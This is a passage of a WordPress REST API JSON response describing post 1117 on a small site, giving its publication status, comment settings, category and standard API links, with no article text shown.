[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-1117","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/1117","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1117"}],"version-history":[{"count":0,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/1117\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1117"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1117"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1117"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}